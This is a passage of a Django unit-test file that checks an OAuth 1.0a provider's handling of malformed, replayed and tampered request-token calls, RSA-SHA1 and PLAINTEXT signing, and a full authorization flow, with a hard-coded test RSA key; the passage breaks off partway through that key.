self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_unsupported_headers(self):
# Rogue oauth param added
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"this_is_not_good=\"blah\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# Create oauth request and signature
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_duplicated_headers(self):
# Duplicate signature_method
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_unsupported_signature_method(self):
# Add unsupported signature method
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"unsupported\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT)
self.assertEqual(resp.status_code, 400)
self.assertEqual(resp.content, 'Invalid request parameters.')
def test_request_token_invalid_consumer_credentials(self):
# Non existent consumer key
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"unsupported\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % ("aaaaaaaaaaaaaa",str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Append signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params)
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.content, 'Invalid consumer.')
def test_request_token_unknown_scope(self):
        # Passing scope as a form param instead of in the query string - the scope 'DNE' does not exist
form_data = {
'scope':'DNE',
}
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items()))
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Add signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
        request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data,
            content_type="application/x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 400)
self.assertEqual(request_resp.content, 'Could not verify OAuth request.')
def test_request_token_wrong_scope(self):
        # Passing scope as a form param instead of in the query string; it gets changed after signing below
form_data = {
'scope':'all',
}
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
del oauth_header_request_token_params_dict['OAuth realm']
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items()))
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
# Add signature
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
#Change form scope from what oauth_request was made with
form_data['scope'] = 'profile'
        request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data,
            content_type="application/x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 400)
self.assertEqual(request_resp.content, 'Could not verify OAuth request.')
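    # The server recomputes the signature over the params it actually receives,
    # so changing any signed param (like scope above) after signing breaks
    # verification - hence the 400 'Could not verify OAuth request.' responses.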
def test_request_token_same_nonce_and_time(self):
# Nonce/timestamp/token combo should always be unique
# Header params we're passing in
now_time = str(int(time.time()))
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key, now_time)
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request from the header params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
# ========================================
# Try to create another request token with the same nonce
# Header params we're passing in
oauth_header_request_token_params2 = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key, now_time)
# Make string params into dictionary for from_consumer_and_token function
request_token_param_list2 = oauth_header_request_token_params2.split(",")
oauth_header_request_token_params_dict2 = {}
for p in request_token_param_list2:
item = p.split("=")
oauth_header_request_token_params_dict2[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict2['OAuth realm']
        # Build the oauth request from the header params
oauth_request2 = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict2)
# create signature and add it to the header params
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, None)
oauth_header_request_token_params2 = oauth_header_request_token_params2 + ",oauth_signature=%s" % signature2
request_resp2 = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params2)
self.assertEqual(request_resp2.status_code, 400)
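    # The replay protection exercised above follows RFC 5849 section 3.3: a
    # (consumer, token, nonce, timestamp) combination may only be used once,
    # so resending the same nonce and timestamp is rejected with a 400.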
def test_request_token_no_scope(self):
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request from the header params
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=INITIATE_ENDPOINT, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
# Should still give request_token even w/o scope sent
request_resp = self.client.get(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_scope_in_form(self):
# passing scope as form param instead of in query string in this instance
form_data = {
'scope':'all',
'consumer_name':'new_client'
}
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Merge the form data (scope, consumer_name) into the params before signing
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='POST',
http_url=INITIATE_ENDPOINT, parameters=dict(oauth_header_request_token_params_dict.items()+form_data.items()))
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
        # By default django's test client POSTs as multipart; we want form-encoded
request_resp = self.client.post(INITIATE_ENDPOINT, Authorization=oauth_header_request_token_params, data=form_data,
content_type="application/x-www-form-urlencoded")
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_scope_in_qs(self):
# Set scope and consumer_name in param
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"HMAC-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_plaintext(self):
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"PLAINTEXT\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = oauth.SignatureMethod_PLAINTEXT()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
def test_request_token_rsa_sha1(self):
rsa_key = RSA.importKey("""-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----""")
self.consumer.secret = rsa_key.exportKey()
self.consumer.save()
param = {
'scope':'all',
'consumer_name':'new_client'
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/request_token_ready\"" % (self.consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(self.consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
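    # Instead of the hard-coded PEM above, a throwaway test key could be
    # generated on the fly (a sketch, assuming PyCrypto's RSA module is the
    # one already imported as RSA):
    #   rsa_key = RSA.generate(1024)
    #   self.consumer.secret = rsa_key.exportKey()
    #   self.consumer.save()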
def test_request_token_rsa_sha1_full_workflow(self):
# Create a user
User.objects.create_user('mike', '[email protected]', 'dino')
self.client.login(username='mike', password='dino')
# Register a consumer with rsa
name = "test mike client"
desc = "test mike client desc"
rsa_key = """-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
AO/0isr/3aa6O6NLQxISLKcPDk2NOccAfS/xOtfOz4sJYM3+Bs4Io9+dZGSDCA54
Lw03eHTNQghS0A==
-----END PRIVATE KEY-----"""
form = {"name":name, "description":desc, "rsa": True, "secret":rsa_key}
my_reg_client = self.client.post(reverse(reg_client),form)
self.assertEqual(my_reg_client.status_code, 200)
consumer = Consumer.objects.get(name=name)
self.client.logout()
param = {
'scope':'all',
'consumer_name': name
}
request_token_path = "%s?%s" % (INITIATE_ENDPOINT, urllib.urlencode(param))
# Header params we're passing in
oauth_header_request_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"requestnonce\","\
"oauth_version=\"1.0\","\
"oauth_callback=\"http://example.com/token_ready\"" % (consumer.key,str(int(time.time())))
# Make the params into a dict to pass into from_consumer_and_token
request_token_param_list = oauth_header_request_token_params.split(",")
oauth_header_request_token_params_dict = {}
for p in request_token_param_list:
item = p.split("=")
oauth_header_request_token_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # get_oauth_request in the views ignores realm, so remove it before building the request
        del oauth_header_request_token_params_dict['OAuth realm']
        # Build the oauth request (scope is carried in the query string of request_token_path)
oauth_request = oauth.Request.from_consumer_and_token(consumer, token=None, http_method='GET',
http_url=request_token_path, parameters=oauth_header_request_token_params_dict)
# create signature and add it to the header params
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, consumer, None)
oauth_header_request_token_params = oauth_header_request_token_params + ",oauth_signature=%s" % signature
request_resp = self.client.get(request_token_path, Authorization=oauth_header_request_token_params)
self.assertEqual(request_resp.status_code, 200)
self.assertIn('oauth_token_secret', request_resp.content)
self.assertIn('oauth_token', request_resp.content)
self.assertIn('oauth_callback_confirmed', request_resp.content)
request_token = Token.objects.get(consumer=consumer)
# ============= END INITIATE =============
# ============= AUTHORIZE =============
# Create authorize path, must have oauth_token param
authorize_param = {'oauth_token': request_token.key}
authorize_path = "%s?%s" % (AUTHORIZATION_ENDPOINT, urllib.urlencode(authorize_param))
        # Try to hit the auth path; user should be redirected to login first
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 302)
self.assertIn('http://testserver/accounts/login?next=/XAPI/OAuth/authorize%3F', auth_resp['Location'])
self.assertIn(request_token.key, auth_resp['Location'])
self.client.login(username='mike', password='dino')
self.assertEqual(request_token.is_approved, False)
# After being redirected to login and logging in again, try get again
auth_resp = self.client.get(authorize_path)
self.assertEqual(auth_resp.status_code, 200) # Show return/display OAuth authorized view
# Get the form, set required fields
auth_form = auth_resp.context['form']
data = auth_form.initial
data['authorize_access'] = 1
data['oauth_token'] = request_token.key
# Post data back to auth endpoint - should redirect to callback_url we set in oauth headers with request token
auth_post = self.client.post(AUTHORIZATION_ENDPOINT, data)
self.assertEqual(auth_post.status_code, 302)
# Check if oauth_verifier and oauth_token are returned
self.assertIn('http://example.com/token_ready?oauth_verifier=', auth_post['Location'])
self.assertIn('oauth_token=', auth_post['Location'])
# Get token again just to make sure
request_token_after_auth = Token.objects.get(consumer=consumer)
self.assertIn(request_token_after_auth.key, auth_post['Location'])
self.assertEqual(request_token_after_auth.is_approved, True)
# ============= END AUTHORIZE =============
# ============= ACCESS TOKEN =============
# Set verifier in access_token params and create new oauth request
oauth_header_access_token_params = "OAuth realm=\"test\","\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\","\
"oauth_verifier=\"%s\"" % (consumer.key, request_token_after_auth.key, str(int(time.time())), "access_nonce", request_token_after_auth.verifier)
# from_token_and_callback takes a dictionary
param_list = oauth_header_access_token_params.split(",")
oauth_header_access_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_access_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # from_request ignores realm; remove it so it is not passed to from_token_and_callback
del oauth_header_access_params_dict['OAuth realm']
oauth_request = oauth.Request.from_token_and_callback(request_token_after_auth, http_method='GET',
http_url=TOKEN_ENDPOINT, parameters=oauth_header_access_params_dict)
# Create signature and add it to the headers
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, consumer, request_token_after_auth)
oauth_header_access_token_params += ',oauth_signature="%s"' % signature
# Get access token
access_resp = self.client.get(TOKEN_ENDPOINT, Authorization=oauth_header_access_token_params)
self.assertEqual(access_resp.status_code, 200)
content = access_resp.content.split('&')
access_token_secret = content[0].split('=')[1]
access_token_key = content[1].split('=')[1]
access_token = Token.objects.get(secret=urllib.unquote_plus(access_token_secret), key=access_token_key)
# ============= END ACCESS TOKEN =============
        # Set the oauth headers the user will use when hitting the xapi endpoint with the access token
oauth_header_resource_params = "OAuth realm=\"test\", "\
"oauth_consumer_key=\"%s\","\
"oauth_token=\"%s\","\
"oauth_signature_method=\"RSA-SHA1\","\
"oauth_timestamp=\"%s\","\
"oauth_nonce=\"%s\","\
"oauth_version=\"1.0\"" % (consumer.key, access_token.key, str(int(time.time())), "resource_nonce")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
        # from_request ignores realm; remove it so it is not passed to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
path = TEST_SERVER + "/XAPI/statements"
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
# Create signature and add it to the headers
signature_method = SignatureMethod_RSA_SHA1()
signature = signature_method.sign(oauth_request, consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
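    # The workflow above is the full OAuth 1.0a three-legged dance: initiate
    # (request token) -> authorize (user approval yields a verifier) -> token
    # (verifier exchanged for an access token) -> signed resource request.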
def test_request_token_rsa_sha1_wrong_key(self):
rsa_key = RSA.importKey("""-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBALRiMLAh9iimur8V
A7qVvdqxevEuUkW4K+2KdMXmnQbG9Aa7k7eBjK1S+0LYmVjPKlJGNXHDGuy5Fw/d
7rjVJ0BLB+ubPK8iA/Tw3hLQgXMRRGRXXCn8ikfuQfjUS1uZSatdLB81mydBETlJ
hI6GH4twrbDJCR2Bwy/XWXgqgGRzAgMBAAECgYBYWVtleUzavkbrPjy0T5FMou8H
X9u2AC2ry8vD/l7cqedtwMPp9k7TubgNFo+NGvKsl2ynyprOZR1xjQ7WgrgVB+mm
uScOM/5HVceFuGRDhYTCObE+y1kxRloNYXnx3ei1zbeYLPCHdhxRYW7T0qcynNmw
rn05/KO2RLjgQNalsQJBANeA3Q4Nugqy4QBUCEC09SqylT2K9FrrItqL2QKc9v0Z
zO2uwllCbg0dwpVuYPYXYvikNHHg+aCWF+VXsb9rpPsCQQDWR9TT4ORdzoj+Nccn
qkMsDmzt0EfNaAOwHOmVJ2RVBspPcxt5iN4HI7HNeG6U5YsFBb+/GZbgfBT3kpNG
WPTpAkBI+gFhjfJvRw38n3g/+UeAkwMI2TJQS4n8+hid0uus3/zOjDySH3XHCUno
cn1xOJAyZODBo47E+67R4jV1/gzbAkEAklJaspRPXP877NssM5nAZMU0/O/NGCZ+
3jPgDUno6WbJn5cqm8MqWhW1xGkImgRk+fkDBquiq4gPiT898jusgQJAd5Zrr6Q8
